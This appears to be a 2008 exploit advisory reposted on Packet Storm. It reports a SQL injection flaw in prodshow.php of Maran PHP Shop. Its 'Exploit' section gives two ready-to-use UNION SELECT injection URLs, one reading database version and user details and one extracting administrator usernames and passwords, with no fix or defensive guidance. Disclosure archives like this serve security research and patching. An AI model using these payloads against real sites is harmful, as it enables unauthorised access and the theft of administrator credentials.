Maran PHP Shop suffers from a remote SQL injection vulnerability in prodshow.php.
d23b579775fbbb1cce3b91bcd7d9b9a9eae7ce0ce3011ac03274349cd4440760[~]-------------------------------------------------------------------------------------------------------------
[~] Maran PHP Shop (prodshow.php) SQL Injection Vulnerability
[~]
[~] http://www.maran.pamil-visions.com/maranshop.php
[~]
[~]
[~] ------------------------------------------------------------------------------------------------------------
[~] Bug founded by d3v1l [Avram Marius]
[~]
[~] Date: 12.10.2008
[~]
[~]
[~] d3v1l@spoofer.com http://security-sh3ll.com
[~]
[~] ------------------------------------------------------------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] milw0rm staff
[~]-------------------------------------------------------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/prodshow.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7
[~]
[~] http://site.com/prodshow.php?id=1 UNION SELECT 1,concat(user_password,char(58),user_name),3,4,5,6,7 FROM administrators
[~]----------------------------------------------------------------------------------------------------------------------
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed